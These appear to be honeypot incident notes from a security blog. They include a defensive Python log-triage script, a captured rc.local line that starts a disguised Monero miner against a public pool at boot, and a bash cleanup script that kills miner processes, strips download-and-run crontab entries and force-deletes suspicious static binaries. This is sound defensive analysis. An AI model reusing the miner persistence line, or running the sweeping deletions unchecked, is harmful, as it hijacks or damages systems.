Captured artifacts
https://github.com/yingshang/Legacy-of-intrusion.git
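2019-3-19
The attacker uploaded several scripts. One of them keeps generating new files and executing them non-stop, which exhausts the disk and memory; my honeypot froze completely.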
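An added example (not part of the original notes): a small Python triage script for a file-monitor log in the `INFO:root:CREATE event : <path> <timestamp>` format this honeypot records. It flags writes to boot, cron and SSH persistence locations and bursts of new files appearing in system binary directories. The sample lines, thresholds and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Event line as written by the file monitor; an optional "Line N: " prefix
# (left by an editor's search view) is tolerated.
EVENT_RE = re.compile(
    r"^(?:Line \d+: )?INFO:root:(?P<kind>[A-Z]+) event : (?P<path>.+) "
    r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{6})$"
)
# Locations that init, cron or sshd read on their own schedule.
PERSISTENCE_RE = re.compile(
    r"^/etc/(init\.d/|rc[0-6S]\.d/|rc\.local$|crontab$|cron\.[a-z]+/)"
    r"|^/var/spool/cron/|/\.ssh(/|$)"
)
BIN_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin")

# Constructed sample, not taken from the capture.
SAMPLE_LOG = """\
INFO:root:CREATE event : /dev/shm/stage1 2019-01-01 10:00:00.000000
INFO:root:CREATE event : /etc/init.d/examplesvc 2019-01-01 10:00:05.100000
INFO:root:CREATE event : /etc/rc3.d/S90examplesvc 2019-01-01 10:00:05.200000
INFO:root:CREATE event : /etc/cron.hourly/example.sh 2019-01-01 10:00:05.300000
Line 120: INFO:root:CREATE event : /usr/bin/xxxxxxxxaa 2019-01-01 10:00:10.000000
INFO:root:MODIFY event : /usr/bin/xxxxxxxxaa 2019-01-01 10:00:10.500000
INFO:root:CREATE event : /usr/bin/xxxxxxxxab 2019-01-01 10:00:15.000000
INFO:root:CREATE event : /usr/bin/xxxxxxxxac 2019-01-01 10:00:20.000000
INFO:root:CREATE event : /usr/bin/xxxxxxxxad 2019-01-01 10:00:25.000000
INFO:root:CREATE event : /usr/bin/xxxxxxxxae 2019-01-01 10:00:30.000000
INFO:root:CREATE event : /usr/bin/xxxxxxxxaf 2019-01-01 10:00:35.000000
INFO:root:MODIFY event : /etc/rc.local 2019-01-01 10:01:00.000000
INFO:root:CREATE event : /usr/bin/legit-tool 2019-01-01 12:00:00.000000
this line is not an event and is skipped
"""


def parse_events(text):
    """Return [(kind, path, datetime)] for every well-formed line; skip the rest."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((m["kind"], m["path"], ts))
    return events


def persistence_writes(events):
    """Distinct paths created or modified in persistence locations, in log order."""
    hits = [p for kind, p, _ in events
            if kind in ("CREATE", "MODIFY") and PERSISTENCE_RE.search(p)]
    return list(dict.fromkeys(hits))


def churn_bursts(events, min_files=5, window_s=60.0):
    """Find binary directories where many distinct new files appear quickly.

    Returns {directory: (files_in_largest_burst, median_gap_seconds)} for each
    directory whose largest burst within window_s has at least min_files files.
    """
    first_seen = defaultdict(dict)  # directory -> {path: first CREATE time}
    for kind, path, ts in events:
        directory = path.rpartition("/")[0]
        if kind == "CREATE" and directory in BIN_DIRS:
            first_seen[directory].setdefault(path, ts)

    bursts = {}
    for directory, paths in first_seen.items():
        times = sorted(paths.values())
        best, span, lo = 0, (0, 0), 0
        for hi in range(len(times)):
            # Shrink the window from the left until it fits in window_s.
            while (times[hi] - times[lo]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 > best:
                best, span = hi - lo + 1, (lo, hi)
        if best >= max(min_files, 2):
            run = times[span[0]:span[1] + 1]
            gaps = [(b - a).total_seconds() for a, b in zip(run, run[1:])]
            bursts[directory] = (best, round(median(gaps), 1))
    return bursts


if __name__ == "__main__":
    evts = parse_events(SAMPLE_LOG)
    print("persistence writes:", persistence_writes(evts))
    print("churn bursts:", churn_bursts(evts))
```

A near-constant median gap between creations points to a timer-driven process rather than a package install, which writes many files within the same second.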
2019-3-21
Monero mining
```
# cat /etc/rc.local
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
/bin/dhpcd -o ca.minexmr.com:4444 -t1 --safe -B >/dev/null 2>/dev/null
exit 0
```
```
root@92ae08a47348:/opt# ./dhpcd -h
Usage: xmrig [OPTIONS]
Options:
  -a, --algo=ALGO          specify the algorithm to use
                             cryptonight
  -o, --url=URL            URL of mining server
  -O, --userpass=U:P       username:password pair for mining server
  -u, --user=USERNAME      username for mining server
  -p, --pass=PASSWORD      password for mining server
      --rig-id=ID          rig identifier for pool-side statistics (needs pool support)
  -t, --threads=N          number of miner threads
  -v, --av=N               algorithm variation, 0 auto select
  -k, --keepalive          send keepalived packet for prevent timeout (needs pool support)
      --nicehash           enable nicehash.com support
      --tls                enable SSL/TLS support (needs pool support)
      --tls-fingerprint=F  pool TLS certificate fingerprint, if set enable strict certificate pinning
  -r, --retries=N          number of times to retry before switch to backup server (default: 5)
  -R, --retry-pause=N      time to pause between retries (default: 5)
      --cpu-affinity       set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
      --cpu-priority       set process priority (0 idle, 2 normal to 5 highest)
      --no-huge-pages      disable huge pages support
      --no-color           disable colored output
      --variant            algorithm PoW variant
      --donate-level=N     donate level, default 5% (5 minutes in 100 minutes)
      --user-agent         set custom user-agent string for pool
  -B, --background         run the miner in the background
  -c, --config=FILE        load a JSON-format configuration file
  -l, --log-file=FILE      log all output to a file
  -S, --syslog             use system log for output messages
      --max-cpu-usage=N    maximum CPU usage for automatic threads mode (default 75)
      --safe               safe adjust threads and av settings for current CPU
      --asm=ASM            ASM code for cn/2, possible values: auto, none, intel, ryzen, bulldozer.
      --print-time=N       print hashrate report every N seconds
      --api-port=N         port for the miner API
      --api-access-token=T access token for API
      --api-worker-id=ID   custom worker-id for API
      --api-id=ID          custom instance ID for API
      --api-ipv6           enable IPv6 support for API
      --api-no-restricted  enable full remote access (only if API token set)
      --dry-run            test configuration and exit
  -h, --help               display this help and exit
  -V, --version            output version information and exit
```
2019-03-22
#!/bin/bash
export LC_ALL=C
oldPATH="$PATH"
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
post_run_file=`mktemp`
test "$post_run_file" || post_run_file=/tmp/tmp.post_run_file.$$

sed -i '/\/etc\/cron\.hourly\/\(gcc\|cron\)\.sh/d' /etc/crontab
rm -f /etc/cron.hourly/gcc.sh /etc/cron.hourly/gcc4.sh /lib/libudev.so /root/pty /tmp/bash /dev/shm/bash /var/tmp/bash /var/lock/bash /var/run/bash /bin/httpsd /lib/udev/udev /lib/udev/debug /root/sysem /root/systma /etc/jourxlv /tmp/sysem /tmp/su /tmp/ddgs.*
rm -rf /tmp/.xm /root/.system /tmp/.iokb21 /var/tmp/... /tmp/.tmp /usr/cpu/bin '/var/tmp/ ' /tmp/.X12-unix /var/tmp/." " /tmp/.mountfs /tmp/seconfig /root/.ttp
chattr -i /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ceurnad
chattr -i -a /usr/local/sbin/t /usr/local/sbin/rsync
rm -f /usr/local/sbin/t /usr/local/sbin/rsync /etc/ceurnad
pkill -9 -f 'python /bin/httpsd' # order of args matters on some systems
pkill -9 xm32
pkill -9 xm64
pkill -9 ceurnad
pkill -9 .xmrig
pkill -9 -f /tmp/.xs/daemon.i686.mod
pkill -9 -f ./systma
pkill -9 -f /root/.local/syslogd
pkill -9 -f /tmp/samba
pkill -9 xorgg
pkill -9 sc64u
pkill -9 -f /tmp/su

if cd /etc/cron.hourly ; then
    for f in *;do
        grep -e 'cp "/bin/'${f%.sh}'" "/bin/' -e 'cp "/usr/bin/'${f%.sh}'" "/usr/bin/' "$f" && rm -f "$f"
    done
fi

crontab -l | grep -v 'wget .*sh' | grep -v 'curl .*sh' | grep -v '/pty .*/dev/null' | crontab -

if which file ; then
    #find ${PATH//:/ } | while read f; do file "$f";done | grep \
    find ${oldPATH//:/ } | xargs file | grep \
        'statically linked' | cut -d: -f1 | grep -v -e '/mbchk$' \
        -e 'dump' -e 'kube' -e ngrok -e iscsistart -e '_ctl$' -e fsck -e '/minidlnad$' \
        -e docker -e xenstore -e wine -e nsenter -e importenv -e aide -e shadowsocks \
        -e mount -e 'bin/bcm\.user' -e partclone -e drbl-chntpw -e '/crictl$' \
        -e '/helm$' -e etcdctl -e '/e3$' -e raid -e agent -e 'print' -e '/isamchk$' \
        -e '/mysql' -e '/mdadm$' -e '/jq$' -e '/usr/sbin/redhat_lsb_trigger\.' \
        -e '/pfmon' -e '/pfdbg' -e '/packer$' -e '/dns-rebind$' -e '/sz$' -e '/retpan$' \
        -e '/gshelld$' -e 'helper$' -e '\.backup$' -e '/ffmpeg$' -e '/rar$' \
        -e '/unhide' -e '/rebind$' -e '/v2ctl$' -e '/unace$' -e '/resume$' \
        -e '/tw_cli$' -e '/MegaCli$' -e '/lsiutil$' -e '/start$' -e '/fbi$' \
        -e 'cobol$' -e '/pack_isam$' -e '/myisa' -e '/isamlog$' -e '/perror$' \
        -e 'track' -e 'monitor' -e geckodriver -e '/koolshare' -e '/wipefs$' \
        -e wrapper -e replace -e resolveip -e server -e '/ethos-id$' \
        -e '/gofmt$' \
        -e '/v2ray$' -e '/gitlab-runner$' -e '/hdsfusemnt$' -e '/qtvagent$' \
        -e '/xvbeat$' \
        -e '/grub$' -e '\.static$' -e '\.old$' | grep -v -F \
        -e '/usr/bin/valgrind' \
        -e '/usr/sbin/tzdata-update' \
        -e '/sbin/busybox' \
        -e '/sbin/cryptsetup' \
        -e '/sbin/dump' \
        -e '/sbin/e2fsck' \
        -e '/sbin/fsck.ext2' \
        -e '/sbin/fsck.ext3' \
        -e '/sbin/ldconfig' \
        -e '/sbin/mpath_ctl' \
        -e '/sbin/nash' \
        -e '/sbin/restore' \
        -e '/sbin/rmt' \
        -e '/sbin/sln' \
        -e '/bin/sln' \
        -e '/usr/sbin/build-locale-archive' \
        -e '/usr/sbin/glibc_post_upgrade.i686' \
        -e '/usr/sbin/glibc_post_upgrade.x86_64' \
        -e '/usr/sbin/libgcc_post_upgrade' \
        -e '/usr/sbin/prelink' \
        -e '/usr/sbin/plesk' \
        -e '/usr/bin/wine64-preloader' \
        -e '/usr/bin/wine-preloader' \
        -e '/bin/busybox' \
        -e '/bin/dhpcd' \
        -e '/mpath_prio_' \
        -e '/usr/sbin/sas2ircu' \
        -e '/usr/bin/rar' \
        -e '/usr/bin/rlpdump' \
        -e '/usr/bin/oracle' \
        -e '/sbin/init' \
        -e /usr/bin/netserve \
        -e /sbin/auibusy \
        -e '/sbin/auplink' \
        -e /sbin/aumvdown \
        -e '/usr/local/bin/sas2ircu' \
        -e '/usr/local/bin/sas3ircu' \
        -e '/usr/sbin/glibc_post_upgrade' \
        -e '/sbin/discover' \
        -e '/usr/bin/jad' | while read ff;do
        chattr -i "$ff"
        # rm -vi "$ff"</dev/tty
        rm -f "$ff"
        if echo "$ff" | grep '/ps$' ; then
            echo 'yum -y install procps || yum -y reinstall procps || apt-get install --reinstall procps' >>$post_run_file
        fi
        if echo "$ff" | grep '/ss$' ; then
            echo 'yum -y install iproute || yum -y reinstall iproute || apt-get install --reinstall iproute' >>$post_run_file
        fi
        if echo "$ff" | grep '/lsof$' ; then
            echo 'yum -y install lsof || yum -y reinstall lsof || apt-get install --reinstall lsof' >>$post_run_file
        fi
        if echo "$ff" | grep '/netstat$' ; then
            echo 'yum -y install net-tools || yum -y reinstall net-tools || apt-get install --reinstall net-tools' >>$post_run_file
        fi
    done
fi

echo More checks:
ls -l /proc/*/exe 2>/dev/null | grep -e /tmp -e /dev -e /var -e '\./' -e /usb_bus
if which file ; then
    for l in /proc/*/exe;do file "`readlink -f $l`" | grep -e 'statically linked' -e 'too many section header sections' && echo $l;done
fi
echo 'top -bn1 | head -n 20:'
top -bn1 | head -n 20
echo atq:
atq
echo 'crontab -l:'
crontab -l
echo /etc/crontab:
cat /etc/crontab
echo /etc/cron.hourly:
ls -la /etc/cron.hourly
echo /etc/cron.d:
ls -la /etc/cron.d
set -x
. $post_run_file
rm $post_run_file
Source: freebuf.com 2019-03-23 18:36:50 by: 陌度